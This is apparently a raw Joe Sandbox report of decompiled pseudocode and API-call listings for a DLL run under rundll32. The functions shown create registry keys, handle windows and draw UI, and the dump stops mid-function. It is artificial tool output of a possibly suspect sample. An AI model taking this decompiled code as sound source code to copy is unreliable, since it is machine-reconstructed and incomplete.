                                                                                                        				void* _v8;
                                                                                                        				void* _v12;
                                                                                                        				void* _v16;
                                                                                                        				int _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _t32;
                                                                                                        
                                                                                                        				_t32 = __ecx;
                                                                                                        				_v24 = __ecx;
                                                                                                        				_v16 = 0;
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                        					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                        				}
                                                                                                        				if(_v8 != 0) {
                                                                                                        					RegCloseKey(_v8);
                                                                                                        				}
                                                                                                        				if(_v12 != 0) {
                                                                                                        					RegCloseKey(_v12);
                                                                                                        				}
                                                                                                        				return _v16;
                                                                                                        			}










                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1001BCF0
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD13
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD2F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1001BD3F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1001BD49
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreate$Open
                                                                                                        • String ID: software
                                                                                                        • API String ID: 1740278721-2010147023
                                                                                                        • Opcode ID: fe647fdf49ef220c3fd35909b2e2998ceb588bdbf99c8fab707d520cad160355
                                                                                                        • Instruction ID: a0fbfe7504193fb7f9e2b6d6b11f75e844a94851742b3b56719e4681f93b2284
                                                                                                        • Opcode Fuzzy Hash: fe647fdf49ef220c3fd35909b2e2998ceb588bdbf99c8fab707d520cad160355
                                                                                                        • Instruction Fuzzy Hash: 4C110676D00159FBDB11DB9ACC88DDFBFFCEF89740B1040AAE501A6121E3709A44DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 1000C782
                                                                                                        • GetWindowRect.USER32 ref: 1000C79D
                                                                                                        • ScreenToClient.USER32 ref: 1000C7B0
                                                                                                        • ScreenToClient.USER32 ref: 1000C7B9
                                                                                                        • EqualRect.USER32 ref: 1000C7C3
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 1000C7EB
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 1000C7F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                        • String ID:
                                                                                                        • API String ID: 443303494-0
                                                                                                        • Opcode ID: b94fce1a0bde8a826347b62c6e8f275f950f89a328fe2f1b8d2853b90cb18fb6
                                                                                                        • Instruction ID: 48e29e304c3a4b7487bb55b9a5c17609bca1f45d73b5d7918b2b35c714da091a
                                                                                                        • Opcode Fuzzy Hash: b94fce1a0bde8a826347b62c6e8f275f950f89a328fe2f1b8d2853b90cb18fb6
                                                                                                        • Instruction Fuzzy Hash: 9811F47650021AAFE710DF65DC84DAB7BBDEF88350B108429FD55E3155D730A911CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 100381E5: PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10038226
                                                                                                          • Part of subcall function 100381E5: SetRectEmpty.USER32(?), ref: 1003824A
                                                                                                          • Part of subcall function 100381E5: GetDesktopWindow.USER32 ref: 10038262
                                                                                                          • Part of subcall function 100381E5: LockWindowUpdate.USER32(?,00000000), ref: 10038273
                                                                                                          • Part of subcall function 100381E5: GetDCEx.USER32(?,00000000,00000003), ref: 1003828A
                                                                                                          • Part of subcall function 10008810: GetModuleHandleA.KERNEL32(GDI32.DLL,?,100388F6), ref: 10008818
                                                                                                          • Part of subcall function 10008810: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10008824
                                                                                                        • GetWindowRect.USER32 ref: 1003891C
                                                                                                          • Part of subcall function 10008846: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10038903,00000000), ref: 1000884F
                                                                                                          • Part of subcall function 10008846: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,10038903,00000000), ref: 1000885D
                                                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10038A0E
                                                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10038BB4
                                                                                                          • Part of subcall function 100380BD: OffsetRect.USER32(?,?,?), ref: 100380F4
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 1003842C
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 10038436
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 10038440
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 1003844A
                                                                                                          • Part of subcall function 100387B4: GetCapture.USER32 ref: 100387C5
                                                                                                          • Part of subcall function 100387B4: SetCapture.USER32(?), ref: 100387D5
                                                                                                          • Part of subcall function 100387B4: GetCapture.USER32 ref: 100387E1
                                                                                                          • Part of subcall function 100387B4: GetMessageA.USER32 ref: 100387FB
                                                                                                          • Part of subcall function 100387B4: DispatchMessageA.USER32 ref: 1003882D
                                                                                                          • Part of subcall function 100387B4: GetCapture.USER32 ref: 1003888B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Offset$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1062258019-0
                                                                                                        • Opcode ID: 2d653a25a98ae8d2332fc53cbc84837d60d60e382b7a049b87c018ddb779d706
                                                                                                        • Instruction ID: 0ccee5dc33a989faf55df8631e11426c58213659a7abf0a6825cd71ee695ccf4
                                                                                                        • Opcode Fuzzy Hash: 2d653a25a98ae8d2332fc53cbc84837d60d60e382b7a049b87c018ddb779d706
                                                                                                        • Instruction Fuzzy Hash: 05B14876900219AFCF06DFA8C885EEE7BBAFF4A311F004594FD05AF255D671AA44CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002DDA9(intOrPtr* __ecx, void* __edx, signed int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr* _v12;
                                                                                                        				int _v16;
                                                                                                        				char _v20;
                                                                                                        				struct tagRECT _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				int _v48;
                                                                                                        				int _v52;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed char _t103;
                                                                                                        				signed int _t118;
                                                                                                        				int _t123;
                                                                                                        				signed int _t139;
                                                                                                        				signed int _t141;
                                                                                                        				signed int _t152;
                                                                                                        				intOrPtr* _t161;
                                                                                                        				intOrPtr* _t182;
                                                                                                        				void* _t192;
                                                                                                        				signed int _t195;
                                                                                                        				intOrPtr* _t199;
                                                                                                        
                                                                                                        				_t192 = __edx;
                                                                                                        				_t161 = _a4;
                                                                                                        				_v12 = __ecx;
                                                                                                        				 *((intOrPtr*)( *_t161 + 0x1c))();
                                                                                                        				 *((intOrPtr*)( *_t161 + 0x34))(1);
                                                                                                        				 *((intOrPtr*)( *_t161 + 0x38))( &_v20, 0, 0);
                                                                                                        				E10008BD3(_t161,  &_v20, 0, 0);
                                                                                                        				_t194 =  &_v36;
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_t168 =  &_v36;
                                                                                                        				asm("movsd");
                                                                                                        				E1002D766( &_v36);
                                                                                                        				_t199 = _v12;
                                                                                                        				_t103 =  *(_t199 + 4);
                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                        				_a4 = _a4 & 0x00000000;
                                                                                                        				if((_t103 & 0x00000003) != 0) {
                                                                                                        					_t202 = _t103 & 0x00000002;
                                                                                                        					if((_t103 & 0x00000002) == 0) {
                                                                                                        						_t152 =  *((intOrPtr*)( *_t161 + 0x24))(7);
                                                                                                        					} else {
                                                                                                        						_push( *0x100991d4);
                                                                                                        						_t152 = E10009357(_t161, E10009228(_t161,  &_v36,  &_v36, _t199, _t202));
                                                                                                        					}
                                                                                                        					_v8 = _t152;
                                                                                                        					_a4 =  *((intOrPtr*)( *_t161 + 0x24))(5);
                                                                                                        					_t194 = E10008617(_t161, 0xd);
                                                                                                        					InflateRect( &_v36, 1, 1);
                                                                                                        					E100013A0(_t161, _v36.left, _v36.top, _v36.right, _v36.bottom);
                                                                                                        					_t168 = _t161;
                                                                                                        					E10008617(_t161, _t155);
                                                                                                        				}
                                                                                                        				if(( *(_t199 + 4) & 0x00000024) != 0) {
                                                                                                        					UnrealizeObject( *0x100991d0);
                                                                                                        				}
                                                                                                        				if(( *(_t199 + 4) & 0x00000020) != 0) {
                                                                                                        					_t182 = _t161;
                                                                                                        					_t139 =  *((intOrPtr*)( *_t161 + 0x24))(8);
                                                                                                        					_t205 = _v8;
                                                                                                        					if(_v8 == 0) {
                                                                                                        						_v8 = _t139;
                                                                                                        					}
                                                                                                        					_push( *0x100991d0);
                                                                                                        					_t141 = E10009357(_t161, E10009228(_t161, _t182, _t194, _t199, _t205));
                                                                                                        					if(_a4 == 0) {
                                                                                                        						_a4 = _t141;
                                                                                                        					}
                                                                                                        					E100085BB(_t161, 1);
                                                                                                        					_t194 = E10008617(_t161, 3);
                                                                                                        					E100013A0(_t161, _v36.left + 1, _v36.top + 1, _v36.right, _v36.bottom);
                                                                                                        					_t168 = _t161;
                                                                                                        					E10008617(_t161, _t143);
                                                                                                        				}
                                                                                                        				_t208 =  *(_t199 + 4) & 0x00000004;
                                                                                                        				if(( *(_t199 + 4) & 0x00000004) != 0) {
                                                                                                        					_push( *0x100991d0);
                                                                                                        					_t118 = E10009357(_t161, E10009228(_t161, _t168, _t194, _t199, _t208));
                                                                                                        					if(_a4 == 0) {
                                                                                                        						_a4 = _t118;
                                                                                                        					}
                                                                                                        					E100085BB(_t161, 2);
                                                                                                        					E1002DA71(_t199,  &_v52);
                                                                                                        					_t123 = _v44 - _v52;
                                                                                                        					_v16 = _t123;
                                                                                                        					PatBlt( *(_t161 + 4), _v52, _v48, _t123, _v36.top - _v48, 0xf0001);
                                                                                                        					PatBlt( *(_t161 + 4), _v52, _v36.bottom, _v16, _v40 - _v36.bottom, 0xf0001);
                                                                                                        					PatBlt( *(_t161 + 4), _v52, _v36.top, _v36.left - _v52, _v36.bottom - _v36.top, 0xf0001);
                                                                                                        					PatBlt( *(_t161 + 4), _v36.right, _v36.top, _v44 - _v36.right, _v36.bottom - _v36.top, 0xf0001);
                                                                                                        					_t199 = _v12;
                                                                                                        				}
                                                                                                        				if(( *(_t199 + 4) & 0x00000018) != 0) {
                                                                                                        					_v16 =  *((intOrPtr*)( *_t199 + 0xc))();
                                                                                                        					_t195 = 0;
                                                                                                        					do {
                                                                                                        						if((_v16 & 1 << _t195) != 0) {
                                                                                                        							E1002DAC3(_t199, _t192, _t195,  &_v36);
                                                                                                        							E10021614(_t161,  &_v36, 0);
                                                                                                        						}
                                                                                                        						_t195 = _t195 + 1;
                                                                                                        					} while (_t195 < 8);
                                                                                                        				}
                                                                                                        				if(_v8 != 0) {
                                                                                                        					E10009357(_t161, _v8);
                                                                                                        				}
                                                                                                        				if(_a4 != 0) {
                                                                                                        					E10009357(_t161, _a4);
                                                                                                        				}
                                                                                                        				return  *((intOrPtr*)( *_t161 + 0x20))(0xffffffff);
                                                                                                        			}




























                                                                                                        APIs
                                                                                                          • Part of subcall function 10008BD3: SetWindowOrgEx.GDI32(?,?,00000000,?), ref: 10008BF2
                                                                                                          • Part of subcall function 10008BD3: SetWindowOrgEx.GDI32(?,?,00000000,?), ref: 10008C05
                                                                                                        • InflateRect.USER32(?,00000001,00000001), ref: 1002DE4E
                                                                                                        • UnrealizeObject.GDI32(?), ref: 1002DE7B
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF48
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF5E
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF78
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF92
                                                                                                          • Part of subcall function 10009228: __EH_prolog3_catch.LIBCMT ref: 1002A4F5
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,00000000), ref: 10009379
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,?), ref: 1000938F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$SelectWindow$H_prolog3_catchInflateRectUnrealize
                                                                                                        • String ID:
                                                                                                        • API String ID: 336483043-0
                                                                                                        • Opcode ID: 05e2c13a02fd9c4a7fe415c9f1db73316c3b3c725aba90784ffd98a7d8e33aa6
                                                                                                        • Instruction ID: 028808ddba6787b9c4fd4b983e7c69789ce85a61de09a4b4a44f0d5935b0aef6
                                                                                                        • Opcode Fuzzy Hash: 05e2c13a02fd9c4a7fe415c9f1db73316c3b3c725aba90784ffd98a7d8e33aa6
                                                                                                        • Instruction Fuzzy Hash: F5810975A00219AFDF05DFA8CD85EAEBBB5FF48340F054069F906AB296CB75AD04CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10018B13(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                        				int _v8;
                                                                                                        				int _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t57;
                                                                                                        				int _t59;
                                                                                                        				int _t61;
                                                                                                        				int _t63;
                                                                                                        				int _t65;
                                                                                                        				int _t67;
                                                                                                        				void* _t69;
                                                                                                        				void* _t77;
                                                                                                        				int _t78;
                                                                                                        				void* _t81;
                                                                                                        				void* _t85;
                                                                                                        				void* _t89;
                                                                                                        				intOrPtr _t95;
                                                                                                        				int _t98;
                                                                                                        				int _t103;
                                                                                                        				intOrPtr* _t108;
                                                                                                        				int _t117;
                                                                                                        				void* _t121;
                                                                                                        				int _t122;
                                                                                                        				int _t123;
                                                                                                        				int _t145;
                                                                                                        				void* _t156;
                                                                                                        				int* _t157;
                                                                                                        				intOrPtr* _t158;
                                                                                                        				intOrPtr _t159;
                                                                                                        				int _t160;
                                                                                                        				intOrPtr* _t161;
                                                                                                        				intOrPtr* _t162;
                                                                                                        				intOrPtr* _t163;
                                                                                                        				void* _t164;
                                                                                                        
                                                                                                        				_t163 = __ecx;
                                                                                                        				_t57 = E1000AB19(_t121, _t156, __ecx, __eflags);
                                                                                                        				_t122 = 0;
                                                                                                        				_v16 =  *((intOrPtr*)(_t57 + 4));
                                                                                                        				if(_a4 == 0) {
                                                                                                        					_t157 = _t163 + 0xc4;
                                                                                                        					_t59 =  *_t157;
                                                                                                        					__eflags = _t59;
                                                                                                        					if(_t59 == 0) {
                                                                                                        						_t61 =  *((intOrPtr*)( *_t163 + 0x60))();
                                                                                                        						__eflags = _t61;
                                                                                                        						_v8 = _t61;
                                                                                                        						if(_t61 == 0) {
                                                                                                        							L41:
                                                                                                        							_t158 =  *((intOrPtr*)(_v16 + 0x20));
                                                                                                        							_t63 = E1002B674();
                                                                                                        							__eflags = _t63;
                                                                                                        							if(_t63 == 0) {
                                                                                                        								__eflags = _t158 - _t122;
                                                                                                        								if(_t158 != _t122) {
                                                                                                        									_t65 = E1001175A(_t158);
                                                                                                        									__eflags = _t65;
                                                                                                        									if(_t65 != 0) {
                                                                                                        										_t67 =  *((intOrPtr*)( *_t158 + 0x120))();
                                                                                                        										__eflags = _t67;
                                                                                                        										if(_t67 != 0) {
                                                                                                        											_t69 =  *((intOrPtr*)( *_t158 + 0x140))();
                                                                                                        											__eflags = _t69 - _t158;
                                                                                                        											if(_t69 == _t158) {
                                                                                                        												E10028247(_v16);
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L47;
                                                                                                        						}
                                                                                                        						_v20 = E1001D52D(_t163, _t163);
                                                                                                        						_v12 = 0;
                                                                                                        						_t123 =  *((intOrPtr*)( *_t163 + 0x64))( &_v8);
                                                                                                        						do {
                                                                                                        							_t135 = _t123;
                                                                                                        							_t160 = E1000EFFA(_t123);
                                                                                                        							__eflags = _t160;
                                                                                                        							if(__eflags != 0) {
                                                                                                        								L27:
                                                                                                        								_t123 =  *((intOrPtr*)( *_t163 + 0x64))( &_v8);
                                                                                                        								__eflags = _t123;
                                                                                                        								if(_t123 != 0) {
                                                                                                        									L26:
                                                                                                        									_t77 = E1000EFFA(_t123);
                                                                                                        									__eflags = _t77 - _t160;
                                                                                                        									if(_t77 != _t160) {
                                                                                                        										goto L28;
                                                                                                        									}
                                                                                                        									goto L27;
                                                                                                        								}
                                                                                                        								L28:
                                                                                                        								_t78 = E1000EFFA(_t160);
                                                                                                        								__eflags = _t78;
                                                                                                        								if(_t78 == 0) {
                                                                                                        									L31:
                                                                                                        									 *((intOrPtr*)( *_t163 + 0x94))(_t160);
                                                                                                        									__eflags = _v20 - _t160;
                                                                                                        									_t81 =  *_t160;
                                                                                                        									if(_v20 != _t160) {
                                                                                                        										 *((intOrPtr*)(_t81 + 0x60))();
                                                                                                        									} else {
                                                                                                        										 *((intOrPtr*)(_t81 + 0x14c))(0);
                                                                                                        									}
                                                                                                        									_t160 = _v12;
                                                                                                        									goto L35;
                                                                                                        								}
                                                                                                        								_t89 =  *((intOrPtr*)( *_t78 + 0x140))();
                                                                                                        								__eflags = _t89 - _t160;
                                                                                                        								if(_t89 != _t160) {
                                                                                                        									goto L31;
                                                                                                        								}
                                                                                                        								_v12 = _t160;
                                                                                                        								goto L35;
                                                                                                        							}
                                                                                                        							E1000836F(_t123, _t135, _t160, _t163, __eflags);
                                                                                                        							goto L26;
                                                                                                        							L35:
                                                                                                        							__eflags = _t123;
                                                                                                        						} while (_t123 != 0);
                                                                                                        						__eflags = _t160;
                                                                                                        						if(_t160 != 0) {
                                                                                                        							 *((intOrPtr*)( *_t163 + 0x94))(_t160);
                                                                                                        							__eflags = _v20 - _t160;
                                                                                                        							_t85 =  *_t160;
                                                                                                        							if(_v20 != _t160) {
                                                                                                        								 *((intOrPtr*)(_t85 + 0x60))();
                                                                                                        							} else {
                                                                                                        								 *((intOrPtr*)(_t85 + 0x14c))(_t123);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t122 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        						goto L41;
                                                                                                        					}
                                                                                                        					__eflags =  *(_t59 + 0xd4);
                                                                                                        					if( *(_t59 + 0xd4) != 0) {
                                                                                                        						_t59 =  *((intOrPtr*)( *_t163 + 0x10c))(0);
                                                                                                        					}
                                                                                                        					_t145 =  *_t157;
                                                                                                        					__eflags = _t145 - _t122;
                                                                                                        					if(_t145 == _t122) {
                                                                                                        						goto L53;
                                                                                                        					} else {
                                                                                                        						return  *((intOrPtr*)( *_t145 + 0x14c))(_t122);
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					if( *(_t163 + 0xc4) != 0) {
                                                                                                        						 *((intOrPtr*)( *_t163 + 0x108))();
                                                                                                        					}
                                                                                                        					_t147 = _t163;
                                                                                                        					_t161 = E1001D52D(_t163, _t163);
                                                                                                        					if(_t161 == _t122) {
                                                                                                        						_t95 = _v16;
                                                                                                        						__eflags =  *((intOrPtr*)(_t95 + 0x20)) - _t122;
                                                                                                        						if( *((intOrPtr*)(_t95 + 0x20)) != _t122) {
                                                                                                        							_t162 = E10009B1B();
                                                                                                        							_t98 = IsWindowVisible( *(_t162 + 0x20));
                                                                                                        							__eflags = _t98;
                                                                                                        							if(_t98 == 0) {
                                                                                                        								_t103 =  *(_t163 + 0xb0);
                                                                                                        								__eflags = _t103 - _t122;
                                                                                                        								if(_t103 != _t122) {
                                                                                                        									 *((intOrPtr*)( *_t103 + 0x18))(_t103);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t147 = _t162;
                                                                                                        							E10011739(_t162, 5);
                                                                                                        							E1000E5E5(_t122, _t162, _t164, SetActiveWindow( *(_t162 + 0x20)));
                                                                                                        							SetForegroundWindow( *(_t162 + 0x20));
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						if(IsWindowVisible( *(_t161 + 0x20)) == 0) {
                                                                                                        							_t117 =  *(_t163 + 0xb0);
                                                                                                        							if(_t117 != _t122) {
                                                                                                        								 *((intOrPtr*)( *_t117 + 0x18))(_t117);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						 *((intOrPtr*)( *_t161 + 0x14c))(0xffffffff);
                                                                                                        						_t150 = _t161;
                                                                                                        						_t108 = E1000EFFA(_t161);
                                                                                                        						if(_t108 != _t122) {
                                                                                                        							_t150 = _t108;
                                                                                                        							_t161 = _t108;
                                                                                                        							 *((intOrPtr*)( *_t108 + 0x14c))(0xffffffff);
                                                                                                        						}
                                                                                                        						SetForegroundWindow( *(E1000E5E5(_t122, _t150, _t164, GetLastActivePopup( *(_t161 + 0x20))) + 0x20));
                                                                                                        						 *((intOrPtr*)( *_t161 + 0x164))(_t122);
                                                                                                        						_t147 = _t161;
                                                                                                        						 *((intOrPtr*)( *_t161 + 0x160))(1);
                                                                                                        					}
                                                                                                        					if( *((intOrPtr*)(_t163 + 0x50)) == _t122) {
                                                                                                        						E1002B665(_t147, 1);
                                                                                                        					}
                                                                                                        					L47:
                                                                                                        					_t59 =  *(_t163 + 0xb0);
                                                                                                        					if(_t59 == _t122) {
                                                                                                        						L51:
                                                                                                        						if(_a4 == _t122) {
                                                                                                        							L53:
                                                                                                        							return _t59;
                                                                                                        						}
                                                                                                        						return E1001EA0F(_t163, _t164, 1, _t122);
                                                                                                        					}
                                                                                                        					_t159 = _a4;
                                                                                                        					if(_t159 != _t122 ||  *((intOrPtr*)(_t163 + 0xb8)) != _t122) {
                                                                                                        						_t59 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59, _t159);
                                                                                                        						 *((intOrPtr*)(_t163 + 0xb8)) = _t159;
                                                                                                        						goto L51;
                                                                                                        					} else {
                                                                                                        						goto L53;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}










































                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32 ref: 10018B56
                                                                                                        • GetLastActivePopup.USER32(?), ref: 10018B98
                                                                                                        • SetForegroundWindow.USER32(?,00000000), ref: 10018BA7
                                                                                                        • IsWindowVisible.USER32 ref: 10018BD8
                                                                                                        • SetActiveWindow.USER32(?,00000005), ref: 10018BFE
                                                                                                        • SetForegroundWindow.USER32(?,00000000), ref: 10018C0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ActiveForegroundVisible$LastPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 3684474681-0
                                                                                                        • Opcode ID: 5f97f5748719ef74b8b1dcd9681d8bdbf897a9fca772648b8d725f5bd139dfcf
                                                                                                        • Instruction ID: e5432f3983a8165f3984dfe762964b39db488d952a10cb5b933ede7e412970d6
                                                                                                        • Opcode Fuzzy Hash: 5f97f5748719ef74b8b1dcd9681d8bdbf897a9fca772648b8d725f5bd139dfcf
                                                                                                        • Instruction Fuzzy Hash: 83814B357006469FCB05DF64C898A6D77F6FF88384B220579E5469F2A1EB30EF818B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1002E9D3(void* __ecx, intOrPtr* _a4, signed int _a8, int _a12, CHAR* _a16, char _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32) {
                                                                                                        				char* _v8;
                                                                                                        				int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				struct tagSIZE _v24;
                                                                                                        				struct tagTEXTMETRICA _v80;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed short _t70;
                                                                                                        				signed int _t71;
                                                                                                        				struct HDC__* _t72;
                                                                                                        				intOrPtr* _t73;
                                                                                                        				int _t81;
                                                                                                        				char* _t85;
                                                                                                        				signed int _t87;
                                                                                                        				signed int _t94;
                                                                                                        				int _t96;
                                                                                                        				char _t98;
                                                                                                        				void* _t99;
                                                                                                        				intOrPtr* _t101;
                                                                                                        				intOrPtr _t103;
                                                                                                        				signed int _t105;
                                                                                                        				int _t109;
                                                                                                        				intOrPtr* _t110;
                                                                                                        				int _t111;
                                                                                                        				void* _t112;
                                                                                                        				int _t113;
                                                                                                        				char _t125;
                                                                                                        				void* _t132;
                                                                                                        
                                                                                                        				_t100 = __ecx;
                                                                                                        				_t99 = __ecx;
                                                                                                        				_t109 = 0;
                                                                                                        				_t116 =  *((intOrPtr*)(__ecx + 4));
                                                                                                        				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                        					L1:
                                                                                                        					E1000836F(_t99, _t100, _t109, _t112, _t116);
                                                                                                        				}
